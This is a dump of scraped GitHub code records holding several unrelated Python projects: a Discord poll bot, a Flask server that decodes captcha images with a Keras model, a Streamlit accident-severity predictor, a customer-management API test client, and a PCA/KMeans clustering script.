136, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 145, "usage_type": "call"}, {"api_name": "processing.image.ImageProcessing.apply_filters", "line_number": 152, "usage_type": "call"}, {"api_name": "processing.image.ImageProcessing", "line_number": 152, "usage_type": "name"}, {"api_name": "numpy.logical_and", "line_number": 160, "usage_type": "call"}, {"api_name": "processing.image.ImageProcessing.apply_filters", "line_number": 180, "usage_type": "call"}, {"api_name": "processing.image.ImageProcessing", "line_number": 180, "usage_type": "name"}, {"api_name": "storage.image.ImageHandler.save_stack_as_tiff", "line_number": 186, "usage_type": "call"}, {"api_name": "storage.image.ImageHandler", "line_number": 186, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 190, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 190, "usage_type": "name"}, {"api_name": "frontend.figures.plot.Plot.show_stacks", "line_number": 198, "usage_type": "call"}, {"api_name": "frontend.figures.plot.Plot", "line_number": 198, "usage_type": "name"}]} +{"seq_id": "22262112779", "text": "##################################\n# Disabled Needs To Be Re-writen #\n##################################\n\nimport discord\nimport datetime\nimport asyncio\nimport re\nimport global_functions\nimport custom_checks\nfrom discord.ext import commands\nfrom discord.commands import slash_command\n\nclient = discord.Client()\n\n\nemojis = \"🇦 🇧 🇨 🇩 🇪 🇫 🇬 🇭 🇮 🇯 🇰 🇱 🇲 🇳 🇴 🇵 🇶 🇷 🇸 🇹\".split()\nfor i in emojis:\n i.replace(' ', '')\n\ndays = 0\nhours = 0\nminutes = 0\ntimeSeconds = 0\n\n\nclass Poll(discord.Cog):\n\n @slash_command()\n @custom_checks.has_perms(\"poll\")\n async def poll(self, ctx, *, content):\n \"\"\"\n Makes A Poll That Users Can Vote On.\n \"\"\"\n global seconds\n msg = content.split(\",\")\n for field in msg:\n field.strip()\n\n try:\n timeLimitInput = msg[1]\n prevTimeLimitInputPos = 0\n for i in [\"d\", \"h\", \"m\", \"s\"]:\n timeInputPos = re.search(i, timeLimitInput)\n if timeInputPos != None:\n if int(timeLimitInput[prevTimeLimitInputPos:timeInputPos.span()[0]].strip()):\n if i == \"d\":\n days = timeLimitInput[prevTimeLimitInputPos:timeInputPos.span()[0]]\n elif i == \"h\":\n hours = timeLimitInput[prevTimeLimitInputPos:timeInputPos.span()[0]]\n elif i == \"m\":\n minutes = timeLimitInput[prevTimeLimitInputPos:timeInputPos.span()[0]]\n elif i == \"s\":\n timeSeconds = timeLimitInput[prevTimeLimitInputPos:timeInputPos.span()[0]]\n\n prevTimeLimitInputPos = timeInputPos.span()[0] + 1\n\n else:\n if i == \"d\":\n days = 0\n elif i == \"h\":\n hours = 0\n elif i == \"m\":\n minutes = 0\n elif i == \"s\":\n timeSeconds = 0\n\n except:\n await ctx.channel.respond(embed=await global_functions.create_embed(title=\"error\",\n description=\n \"Please Enter A Time In Numbers In The 3rd Position\\n\"\n \"Ex: 3d12h30m30s Meaning 3 Days 12 Hours 30 Minutes And 30 Seconds\"))\n return\n\n embed = discord.Embed(title=msg[0],\n type=\"rich\",\n color=0x08D4D0,\n timestamp=(datetime.timedelta(days=int(days),\n hours=int(hours),\n minutes=int(minutes),\n seconds=int(timeSeconds)) + datetime.datetime.now()))\n embed.set_footer(text=\"Ends\")\n\n options = ''\n count = 0\n del msg[0]\n del msg[0]\n if len(msg) > 20 or len(msg) < 1:\n await ctx.channel.respond(embed=await global_functions.create_embed(title=\"error\",\n description=\"You Must Have 1-20 Options\"))\n return\n for i in msg:\n options = options + emojis[count] + \" \" + i + \"\\n\"\n count += 1\n embed.add_field(name=\"Options\", value=options, inline=False)\n ctx = await ctx.channel.respond(embed=embed)\n for i in range(len(msg)):\n await ctx.add_reaction(emojis[i])\n messageId = ctx.id\n\n endTime = datetime.datetime.now() + datetime.timedelta(days=int(days),\n hours=int(hours),\n minutes=int(minutes),\n seconds=int(timeSeconds))\n seconds = endTime - datetime.datetime.now()\n await asyncio.sleep(seconds.total_seconds())\n ctx = await ctx.channel.fetch_message(messageId)\n winingNumber = 0\n winner = []\n for i in ctx.reactions:\n if i.count == winingNumber:\n winingNumber = i.count\n winner.append(i)\n elif i.count > winingNumber:\n winingNumber = i.count\n winner.clear()\n winner.append(i)\n if len(winner) > 1:\n resultmessage = \"There was a tie between\"\n for i in range(len(winner)):\n resultmessage = resultmessage + \" - \" + str(winner[i])\n await ctx.channel.respond(embed=await global_functions.create_embed(title=\"\",\n description=resultmessage))\n else:\n await ctx.channel.respond(embed=await global_functions.create_embed(title=\"\",\n description=\n \"The wining choice was \" + str(winner[0])))\n\n @poll.error\n async def whitelist_error(self, ctx, error):\n if isinstance(error, commands.CheckFailure):\n await ctx.respond(embed=await global_functions.create_embed(title=\"fail\",\n description=\n \"You Do Not Have Permission To Preform That Command\"))\n\n\ndef setup(client):\n client.add_cog(Poll(client))\n", "repo_name": "Icebluewolf/Wolfy-Discord-Bot", "sub_path": "cogs/poll.py", "file_name": "poll.py", "file_ext": "py", "file_size_in_byte": 5796, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "discord.Client", "line_number": 14, "usage_type": "call"}, {"api_name": "discord.Cog", "line_number": 27, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 44, "usage_type": "call"}, {"api_name": "global_functions.create_embed", "line_number": 69, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 75, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 78, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 81, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 81, "usage_type": "attribute"}, {"api_name": "global_functions.create_embed", "line_number": 89, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 101, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 101, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 101, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 105, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 105, "usage_type": "attribute"}, {"api_name": "asyncio.sleep", "line_number": 106, "usage_type": "call"}, {"api_name": "global_functions.create_embed", "line_number": 122, "usage_type": "call"}, {"api_name": "global_functions.create_embed", "line_number": 125, "usage_type": "call"}, {"api_name": "discord.commands.slash_command", "line_number": 29, "usage_type": "call"}, {"api_name": "custom_checks.has_perms", "line_number": 30, "usage_type": "call"}, {"api_name": "discord.ext.commands.CheckFailure", "line_number": 131, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 131, "usage_type": "name"}, {"api_name": "global_functions.create_embed", "line_number": 132, "usage_type": "call"}]} +{"seq_id": "30979165647", "text": "from flask import Flask, url_for\nfrom flask import request\nfrom flask import json\nfrom skimage import io\nfrom skimage import color\nimport numpy as np\nimport os\nimport re\nfrom keras.models import Model\nfrom keras.models import load_model\nimport base64\nimport uuid\nimport gevent\nfrom gevent.pywsgi import WSGIServer\nfrom gevent import monkey\nmonkey.patch_all()\n\napp = Flask(__name__)\n\nmodel = None\n\ndef loading():\n global model\n model = load_model('../model/model-45.hdf5')\n\n# 构建映射字典\nlabels = ['a','b','c','d','e','f','g',\n 'h','i','j','k','l','m','n',\n 'u','p','q','r','s','t','o',\n 'v','w','x','y','z','0','1',\n '2','3','4','5','6','7','8','9']\nlabel2id = {}\nid2label = {}\n\nfor label in labels:\n label2id[label] = len(label2id)\nfor label, id in label2id.items():\n id2label[id] = label\n\ndef decode(y):\n y = np.argmax(np.array(y), axis=-1)\n return ''.join([id2label[x] for x in y])\n\n@app.route('/')\ndef api_root():\n return 'Welcome'\n\n@app.route('/captcha', methods = ['POST'])\ndef api_message():\n base64_str = ''\n if request.headers['Content-Type'] == 'text/plain':\n base64_str = request.data\n elif request.headers['Content-Type'] == 'application/json':\n base64_str = request.json.get('pic', '')\n else:\n return json.dumps({\"status\":\"NO\", \"msg\":\"request head not support\"})\n if base64_str:\n result = re.search(\"data:image/(?P.*?);base64,(?P.*)\", base64_str, re.DOTALL)\n if result:\n ext = result.groupdict().get(\"ext\")\n data = result.groupdict().get(\"data\")\n else:\n data = src\n try:\n imgdata = base64.b64decode(data)\n tempfilename = str(uuid.uuid1()) + '.png'\n file = open(tempfilename,'wb')\n file.write(imgdata)\n file.close()\n im = io.imread(tempfilename)\n im3 = color.rgb2gray(im)\n pic = np.asarray([np.expand_dims(im3, axis=2)])\n result = np.squeeze(model.predict(pic))\n os.remove(tempfilename)\n return json.dumps({\"status\":\"OK\", \"result\": decode(result)})\n except:\n return json.dumps({\"status\":\"NO\", \"msg\":\"error\"})\n else:\n return json.dumps({\"status\":\"NO\", \"msg\":\"input base64 is empty\"})\n\nif __name__ == '__main__':\n loading() # 加载模型\n http_server = WSGIServer(('127.0.0.1', 8090), app)\n http_server.serve_forever()\n", "repo_name": "jsksxs360/captcha_identification", "sub_path": "src/start_server.py", "file_name": "start_server.py", "file_ext": "py", "file_size_in_byte": 2460, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "46", "api": [{"api_name": "gevent.monkey.patch_all", "line_number": 16, "usage_type": "call"}, {"api_name": "gevent.monkey", "line_number": 16, "usage_type": "name"}, {"api_name": "flask.Flask", "line_number": 18, "usage_type": "call"}, {"api_name": "keras.models.load_model", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 41, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 51, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 51, "usage_type": "name"}, {"api_name": "flask.request.data", "line_number": 52, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.request.headers", "line_number": 53, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 53, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 54, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 54, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 54, "usage_type": "name"}, {"api_name": "flask.json.dumps", "line_number": 56, "usage_type": "call"}, {"api_name": "flask.json", "line_number": 56, "usage_type": "name"}, {"api_name": "re.search", "line_number": 58, "usage_type": "call"}, {"api_name": "re.DOTALL", "line_number": 58, "usage_type": "attribute"}, {"api_name": "base64.b64decode", "line_number": 65, "usage_type": "call"}, {"api_name": "uuid.uuid1", "line_number": 66, "usage_type": "call"}, {"api_name": "skimage.io.imread", "line_number": 70, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 70, "usage_type": "name"}, {"api_name": "skimage.color.rgb2gray", "line_number": 71, "usage_type": "call"}, {"api_name": "skimage.color", "line_number": 71, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 73, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.json.dumps", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.json", "line_number": 75, "usage_type": "name"}, {"api_name": "flask.json.dumps", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.json", "line_number": 77, "usage_type": "name"}, {"api_name": "flask.json.dumps", "line_number": 79, "usage_type": "call"}, {"api_name": "flask.json", "line_number": 79, "usage_type": "name"}, {"api_name": "gevent.pywsgi.WSGIServer", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "20670845971", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nimport streamlit as st\nimport pandas as pd\nimport numpy as np\nimport joblib\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom prediction import get_prediction, ordinal_encoder\nfrom load_model import get_model\n\nmodel = get_model(model_path = r'Model/RTA_model.joblib')\n#model = joblib.load(r\"RTA_model.joblib\")\n\nst.set_page_config(page_title=\"Accident Severity Prediction App\",\n page_icon=\"🚧\", layout=\"wide\")\n\n\n#creating option list for dropdown menu\n\noptions_day = ['Sunday', \"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\"]\n\noptions_age = ['18-30', '31-50', 'Over 51', 'Unknown', 'Under 18']\n\noptions_sex = ['Male', 'Female', 'Unknown']\n\noptions_edu = ['Above high school', 'Junior high school', \n 'Elementary school' ,'High school', 'Unknown', 'Illiterate', 'Writing & reading']\n\noptions_exp = ['1-2yr', 'Above 10yr', '5-10yr', '2-5yr', 'No Licence', 'Below 1yr', 'unknown']\n\noptions_vehicle = ['Automobile', 'Public (> 45 seats)', 'Lorry (41?100Q)', 'Public (13?45 seats)', 'Lorry (11?40Q)', 'Long lorry', 'Public (12 seats)', 'Taxi', 'Pick up upto 10Q', 'Stationwagen', 'Ridden horse', 'Other', 'Bajaj', 'Turbo', 'Motorcycle', 'Special vehicle', 'Bicycle']\n\noptions_vehicle_owner = ['Owner', 'Governmental','Organization', 'Other']\n\noptions_service_year = ['Above 10yr', '5-10yrs', '1-2yr', '2-5yrs', 'Unknown', 'Below 1yr'] \n \noptions_acc_area = ['Other', 'Office areas', 'Residential areas', ' Church areas',\n ' Industrial areas', 'School areas', ' Recreational areas',\n ' Outside rural areas', ' Hospital areas', ' Market areas',\n 'Rural village areas', 'Unknown', 'Rural village areasOffice areas',\n 'Recreational areas']\n\noptions_lanes = ['Undivided Two way', 'other', 'Double carriageway (median)', 'One way', 'Two-way (divided with solid lines road marking)', 'Two-way (divided with broken lines road marking)']\n\noptions_allignment = ['Tangent road with flat terrain','Tangent road with mild grade and flat terrain', 'Escarpments',\n 'Tangent road with rolling terrain', 'Gentle horizontal curve', 'Tangent road with mountainous terrain and',\n 'Steep grade downward with mountainous terrain', 'Sharp reverse curve',\n 'Steep grade upward with mountainous terrain']\n\noptions_junction = ['No junction', 'Y Shape', 'Crossing', 'O Shape', 'Other', 'Unknown', 'T Shape', 'X Shape']\n\noptions_surface_type = ['Asphalt roads', 'Earth roads','Asphalt roads with some distress', 'Gravel roads' 'Other']\n \noptions_surface_conditions = ['Dry', 'Wet or damp', 'Snow', 'Flood over 3cm. deep']\n\noptions_light = ['Daylight', 'Darkness - lights lit', 'Darkness - no lighting', 'Darkness - lights unlit']\n\noptions_weather = ['Normal', 'Raining', 'Raining and Windy', 'Cloudy', 'Other', 'Windy', 'Snow', 'Unknown', 'Fog or mist']\n\noptions_collision = ['Collision with roadside-parked vehicles', 'Vehicle with vehicle collision',\n 'Collision with roadside objects', 'Collision with animals', 'Other', 'Rollover', 'Fall from vehicles',\n 'Collision with pedestrians', 'With Train', 'Unknown']\n \n\n\noptions_vehicle_movement = ['Going straight', 'U-Turn', 'Moving Backward', 'Turnover', 'Waiting to go', 'Getting off',\n 'Reversing', 'Unknown', 'Parked', 'Stopping', 'Overtaking', 'Other', 'Entering a junction']\n\noptions_casualty_class = ['Driver or rider', 'Pedestrian' 'Passenger']\n\noptions_casualty_sex = ['Male', 'Female']\n\noptions_casualty_age = ['31-50', '18-30', 'Under 18', 'Over 51']\n\noptions_casualty_severity = ['3', '2', '1']\n \noptions_pedestrian_movement = ['Not a Pedestrian', \"Crossing from driver's nearside\",\n 'Crossing from nearside - masked by parked or statioNot a Pedestrianry vehicle',\n 'Unknown or other',\n 'Crossing from offside - masked by parked or statioNot a Pedestrianry vehicle',\n 'In carriageway, statioNot a Pedestrianry - not crossing (standing or playing)',\n 'Walking along in carriageway, back to traffic',\n 'Walking along in carriageway, facing traffic',\n 'In carriageway, statioNot a Pedestrianry - not crossing (standing or playing) - masked by parked or statioNot a Pedestrianry vehicle']\n\n\noptions_cause = ['No distancing', 'Changing lane to the right',\n 'Changing lane to the left', 'Driving carelessly',\n 'No priority to vehicle', 'Moving Backward',\n 'No priority to pedestrian', 'Other', 'Overtaking',\n 'Driving under the influence of drugs', 'Driving to the left',\n 'Getting off the vehicle improperly', 'Driving at high speed',\n 'Overturning', 'Turnover', 'Overspeed', 'Overloading', 'Drunk driving',\n 'Unknown', 'Improper parking']\n\n\n\n\nfeatures = ['day_of_week', 'driver_age', 'driver_sex', 'educational_level',\n 'driving_experience', 'vehicle_type', 'vehicle_owner', 'service_year',\n 'accident_area', 'lanes', 'road_allignment', 'junction_type',\n 'surface_type', 'road_surface_conditions', 'light_condition',\n 'weather_condition', 'collision_type', 'vehicles_involved',\n 'casualties', 'vehicle_movement', 'casualty_class', 'casualty_sex',\n 'casualty_age', 'casualty_severity', 'pedestrian_movement',\n 'accident_cause', 'hour', 'minute']\n\nst.markdown(\"

Accident Severity Prediction App 🚧

\", unsafe_allow_html=True)\ndef main():\n with st.form('prediction_form'):\n\n st.subheader(\"Enter the input for following features:\")\n \n vehicles_involved = st.slider(\"Select number of vehicles involved: \", 1, 7, value=0, format=\"%d\")\n casualties = st.slider(\"Select number of causalties involved: \", 1, 8, value=0, format=\"%d\")\n hour = st.slider(\"Select hour of accident: \", 0, 23, value=0, format=\"%d\")\n minute = st.slider(\"Approx. Pickup Minute: \", 0, 59, value=0, format=\"%d\")\n day_of_week = st.selectbox(\"Select day of the week: \", options=options_day)\n driver_age = st.selectbox(\"Select driver age: \", options=options_age)\n driver_sex = st.selectbox(\"Select driver sex: \", options=options_sex)\n education = st.selectbox(\"Select driver ecucational level: \", options=options_edu)\n driver_experience = st.selectbox(\"Select driver experience: \", options=options_exp)\n vehicle_type = st.selectbox(\"Select vehicle type : \", options=options_vehicle)\n vehicle_owner = st.selectbox(\"Select vehicle owner : \", options=options_vehicle_owner)\n service_year = st.selectbox(\"Select vehicle service period : \", options=options_service_year)\n accident_area = st.selectbox(\"Select accident area: \", options=options_acc_area)\n lanes = st.selectbox(\"Select lane: \", options=options_lanes)\n allignment = st.selectbox(\"Select road allignment: \", options=options_allignment)\n junction = st.selectbox(\"Select junction type: \", options=options_junction)\n surface_type = st.selectbox(\"Select road surface type: \", options=options_surface_type)\n surface_conditions = st.selectbox(\"Select road surface condition: \", options=options_surface_conditions)\n light = st.selectbox(\"Select light condition: \", options=options_light)\n weather = st.selectbox(\"Select weather condition: \", options=options_weather)\n collision = st.selectbox(\"Select collision type: \", options=options_collision)\n vehicle_movement = st.selectbox(\"Select vehicle movement: \", options=options_vehicle_movement)\n casualty_class = st.selectbox(\"Select causalty class: \", options=options_casualty_class)\n casualty_sex = st.selectbox(\"Select casualty sex: \", options=options_casualty_sex)\n casualty_age = st.selectbox(\"Select casualty age: \", options=options_casualty_age)\n casualty_severity = st.selectbox(\"Select casualty severity: \", options=options_casualty_severity)\n pedestrian_movement = st.selectbox(\"Select pedestrian movement: \", options=options_pedestrian_movement)\n cause = st.selectbox(\"Select accident cause: \", options=options_cause)\n \n \n \n submit = st.form_submit_button(\"Predict\")\n\n\n if submit:\n day_of_week = ordinal_encoder(day_of_week, options_day)\n driver_age = ordinal_encoder(driver_age, options_age)\n driver_sex = ordinal_encoder(driver_sex, options_sex)\n education = ordinal_encoder(education, options_edu)\n driver_experience = ordinal_encoder(driver_experience, options_exp)\n vehicle_type = ordinal_encoder(vehicle_type, options_vehicle)\n vehicle_owner = ordinal_encoder(vehicle_owner, options_vehicle_owner)\n service_year = ordinal_encoder(service_year, options_service_year)\n accident_area = ordinal_encoder(accident_area, options_acc_area)\n lanes = ordinal_encoder(lanes, options_lanes)\n allignment = ordinal_encoder(allignment, options_allignment)\n junction = ordinal_encoder(junction, options_junction)\n surface_type = ordinal_encoder(surface_type, options_surface_type)\n surface_conditions = ordinal_encoder(surface_conditions, options_surface_conditions)\n light = ordinal_encoder(light, options_light)\n weather = ordinal_encoder(weather, options_weather)\n collision = ordinal_encoder(collision, options_collision)\n vehicle_movement = ordinal_encoder(vehicle_movement, options_vehicle_movement)\n casualty_class = ordinal_encoder(casualty_class, options_casualty_class)\n casualty_sex = ordinal_encoder(casualty_sex, options_casualty_sex)\n casualty_age = ordinal_encoder(casualty_age, options_casualty_age)\n casualty_severity = ordinal_encoder(casualty_severity, options_casualty_severity)\n pedestrian_movement = ordinal_encoder(pedestrian_movement, options_pedestrian_movement)\n cause = ordinal_encoder(cause, options_cause)\n \n \n\n data = np.array([vehicles_involved, casualties, hour, minute, day_of_week, driver_age, driver_sex, education,\n driver_experience, vehicle_type, vehicle_owner, service_year, accident_area, lanes, allignment, \n junction, surface_type, surface_conditions, light, weather, collision, vehicle_movement,casualty_class,\n casualty_sex, casualty_age, casualty_severity, pedestrian_movement, cause]).reshape(1,-1)\n\n pred = get_prediction(data=data, model=model)\n \n if pred[0]==1:\n x='Slight injury'\n elif pred[0]==2:\n x='Serious injury'\n else:\n x='Fatal injury'\n\n st.write(f\"The predicted accident severity is: {x}\")\n\nif __name__ == '__main__':\n main()\n\n", "repo_name": "omkarnigade21/RTA_deployment", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 10972, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "load_model.get_model", "line_number": 15, "usage_type": "call"}, {"api_name": "streamlit.set_page_config", "line_number": 18, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 112, "usage_type": "call"}, {"api_name": "streamlit.form", "line_number": 114, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 116, "usage_type": "call"}, {"api_name": "streamlit.slider", "line_number": 118, "usage_type": "call"}, {"api_name": "streamlit.slider", "line_number": 119, "usage_type": "call"}, {"api_name": "streamlit.slider", "line_number": 120, "usage_type": "call"}, {"api_name": "streamlit.slider", "line_number": 121, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 122, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 123, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 124, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 125, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 126, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 127, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 128, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 129, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 130, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 131, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 132, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 133, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 134, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 135, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 136, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 137, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 138, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 139, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 140, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 141, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 142, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 143, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 144, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 145, "usage_type": "call"}, {"api_name": "streamlit.form_submit_button", "line_number": 149, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 153, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 154, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 155, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 156, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 157, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 158, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 159, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 160, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 161, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 162, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 163, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 164, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 165, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 166, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 167, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 168, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 169, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 170, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 171, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 172, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 173, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 174, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 175, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 180, "usage_type": "call"}, {"api_name": "prediction.get_prediction", "line_number": 185, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 194, "usage_type": "call"}]} +{"seq_id": "14560005247", "text": "from hytest import *\nfrom pprint import pprint\nimport requests,config\n\n# 服务器地址\ntestUrl = GSTORE['testUrl']\n\nclass SMSAPI:\n # 控制台打印\n def _printResponse(self, response):\n print('\\n\\n---------- HTTP response * brgin ----------')\n print(response.status_code)\n for k, v in response.headers.items():\n print(f'{k}:{v}')\n print('')\n print(response.content.decode('utf8'))\n print('---------- HTTP response * end ----------\\n\\n')\n\n #登录API\n def login(self,username,password):\n # 创建 Session 对象\n self.s = requests.Session()\n response = self.s.post(url=testUrl+'/api/mgr/signin',\n data=\n {\n \"username\":username, #用户名\n \"password\":password #密码\n })\n self._printResponse(response)\n return response\n\n # 列出所有客户接口(不携带session)\n def customer_list(self, action, pagesize, pagenum, keywords):\n response = requests.get(url=testUrl + '/api/mgr/customers',\n params={\n \"action\": action, # 必填项,填写值为 list_customer\n \"pagesize\": pagesize, # 必填项,分页的 每页获取多少条记录\n \"pagenum\": pagenum, # 必填项,获取第几页的信息\n \"keywords\": keywords # 可选项, 里面包含的多个过滤关键字,关键字之间用 空格 分开\n })\n self._printResponse(response)\n return response\n\n #列出所有客户接口(携带session)\n def customer_list1(self,action,pagesize,pagenum,keywords):\n response = self.s.get(url=testUrl+'/api/mgr/customers',\n params={\n \"action\" :action, #必填项,填写值为 list_customer\n \"pagesize\":pagesize, #必填项,分页的 每页获取多少条记录\n \"pagenum\" :pagenum, #必填项,获取第几页的信息\n \"keywords\":keywords #可选项, 里面包含的多个过滤关键字,关键字之间用 空格 分开\n })\n self._printResponse(response)\n return response\n\n #新增客户接口(携带session)\n def customer_add(self,action,name,phonenumber,address):\n response = self.s.post(url=testUrl+'/api/mgr/customers',\n headers={'Content-Type': 'application/json'},\n json={\n \"action\":action, # action 字段固定填写 add_customer 表示添加一个客户\n \"data\":{\n \"name\":name, # name 字段长度范围是 2-20\n \"phonenumber\":phonenumber, # phonenumber 字段长度范围是 8-15\n \"address\":address # address 字段长度范围是 2-100\n }\n })\n self._printResponse(response)\n return response\n\n #修改客户信息接口\n def customer_modify(self,action,id,name,phonenumber,address):\n response = self.s.put(url=testUrl+'/api/mgr/customers',\n headers={'Conten-Type':'application/json'},\n json={\n \"action\":action, # action 字段固定填写 modify_customer 表示修改一个客户的信息\n \"id\": id, # id 字段为要修改的客户的id号\n \"newdata\":{\n \"name\":name, # name 客户名\n \"phonenumber\":phonenumber, # phonenumber 联系电话\n \"address\":address # address 地址\n }\n })\n self._printResponse(response)\n return response\n\n #删除客户信息接口\n def customer_del(self,action,id):\n response = self.s.post(url=testUrl+'/api/mgr/customers',\n headers={'Content-Type':'application/json'},\n json={\n \"action\":action, # action 字段固定填写 del_customer 表示删除一个客户\n \"id\": id # id 字段为要删除的客户的id号\n })\n self._printResponse(response)\n return response\n\nSMS = SMSAPI()", "repo_name": "chaoxianle/byhySMS", "sub_path": "lib/webapi.py", "file_name": "webapi.py", "file_ext": "py", "file_size_in_byte": 5050, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "requests.Session", "line_number": 22, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "19056434404", "text": "import seaborn as sns\nfrom sklearn.decomposition import PCA\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndataframe = pd.read_csv(\"small_test.csv\")\n\ndf_rand = np.random.randint(0,10,size=dataframe.shape)\ndataframe = dataframe + df_rand\ndataframe.to_csv(\"small_test.csv\",index=False)\nprint(dataframe)\n\npca = PCA(n_components=2)\nprincipal_components = pca.fit_transform(dataframe)\n\n\nfrom sklearn.cluster import KMeans\nkmeans = KMeans(n_clusters=3)\nkmeans.fit(principal_components)\ncluster_labels = kmeans.labels_\npca_results = pd.DataFrame(data = principal_components, columns = ['PC1', 'PC2'])\npca_results['Cluster'] = cluster_labels\nprint(pca_results)\nsns.scatterplot(x='PC1', y='PC2', hue='Cluster', data=pca_results)\nplt.show()\n", "repo_name": "FabianRuizF/clase_big_data", "sub_path": "clase4/ayuda_trabajo2_kmeans.py", "file_name": "ayuda_trabajo2_kmeans.py", "file_ext": "py", "file_size_in_byte": 756, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", 